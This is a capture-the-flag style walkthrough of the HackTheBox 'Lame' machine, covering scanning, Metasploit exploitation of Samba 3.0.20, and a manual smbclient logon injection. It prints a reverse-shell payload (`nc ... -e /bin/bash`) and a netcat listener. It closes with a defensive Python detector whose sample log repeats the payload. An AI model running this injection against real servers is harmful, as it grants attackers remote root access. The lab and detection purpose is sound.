OSCP Prep: Lame (HackTheBox)
To start with, I performed an Nmap scan on the host. I prefer aggressive scans, and below is the result.
nmap -A 10.10.10.3
From the scan result, it can be observed that ports 21, 22, 139, and 445 are open.
Port 21 - FTP
Port 22 - SSH
Port 139 - Samba
Port 445 - Samba
Enumeration and Exploitation
FTP port 21
Port 21 is open, so I tried an anonymous login to see whether there was anything interesting on the FTP server.
Anonymous login was allowed, but I was not able to get any more information with it. Moving further, the service running on port 21 was vsftpd 2.3.4. Searching with searchsploit turned up two exploits for it: one in Python and the other in Ruby. The Ruby one was a Metasploit module, so I used that one.
With the Metasploit module, I tried to exploit vsftpd, but it was again a failed attempt, as it was asking for the password for user 331 and I did not have the password for that user.
SMB ports 139 & 445
After that, I searched with searchsploit for any public exploits for the Samba version running on the host, and it provided one Metasploit module that could be used to exploit it.
searchsploit samba 3.0.20
I then used the Metasploit framework to proceed with the exploitation.
I used exploit 0 against the machine; for that, RHOSTS had to be set, and in my case LHOST was not set either, so I had to set both.
use 0
show options
set RHOSTS 10.10.10.3
set LHOST 10.10.16.2
Running the “exploit” command gave me a reverse shell as root.
With root access, I retrieved both the user and root flags for the machine.
USER FLAG
ROOT FLAG
Manual Exploit
An alternative is to exploit Samba manually, and for that we use smbclient.
Using smbclient, I was able to list the shares that I might have access to.
After that, I checked the permissions on the tmp share with smbmap.
smbmap //10.10.10.3/tmp
As can be seen from the output, the tmp share is readable and writable. After some research, I learned from the blog below that this can be exploited.
https://medium.com/@nmappn/exploiting-smb-samba-without-metasploit-series-1-b34291bbfd63
After that, I tried it myself.
First, I created the payload.
logon "/=`nc 10.10.16.2 1234 -e /bin/bash`"
Then I connected to the tmp share with smbclient and used the payload, but before that I started a listener on my host.
nc -nvlp 1234
After that, I issued the logon command, which gave me root access, and with that I retrieved both the user and root flags.
smb: \> logon "/=`nc 10.10.16.2 1234 -e /bin/bash`"
After executing the command, I got root access and could retrieve the user and root flags.
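As an added example from the defender's side (not part of this writeup or of Samba itself), here is a small Python detector that scans authentication records for the shell metacharacters the logon trick above depends on. The JSON record format, its field names and the sample lines are constructed for this example and are not Samba's own log format.

```python
import json
import re

# Shell metacharacters that have no place in a legitimate SMB logon name.
# Command substitution (backticks or $(...)) is exactly what the
# logon "/=`...`" trick relies on to reach a shell through the username map.
_SHELL_META = re.compile(r"[`;|&]|\$\(")


def username_is_suspicious(username: str) -> bool:
    """True if the logon name carries shell metacharacters."""
    return bool(_SHELL_META.search(username))


def scan_auth_log(lines):
    """Return (remote_address, username) pairs for records whose logon name
    looks like a username-map injection attempt. Input is one JSON record per
    line; the field names used here are assumptions for this example."""
    hits = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue  # not a record we understand; skip rather than crash
        user = rec.get("clientAccount", "")
        if username_is_suspicious(user):
            hits.append((rec.get("remoteAddress", "?"), user))
    return hits


# Constructed sample records (not real Samba output): one attempt using the
# payload from the writeup, plus ordinary logons that must not alert.
SAMPLE_LOG = r'''
{"remoteAddress": "10.10.16.2", "clientAccount": "/=`nc 10.10.16.2 1234 -e /bin/bash`", "status": "NT_STATUS_NO_SUCH_USER"}
{"remoteAddress": "10.10.16.5", "clientAccount": "alice", "status": "NT_STATUS_OK"}
{"remoteAddress": "10.10.16.7", "clientAccount": "CORP\\bob.smith", "status": "NT_STATUS_OK"}
'''

if __name__ == "__main__":
    for addr, user in scan_auth_log(SAMPLE_LOG.splitlines()):
        print(f"ALERT {addr}: shell metacharacters in logon name {user!r}")
```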
If you enjoyed this blog and found the information helpful, consider buying me a coffee! Your support helps me keep creating content like this. Just click the button below — thanks for your generosity!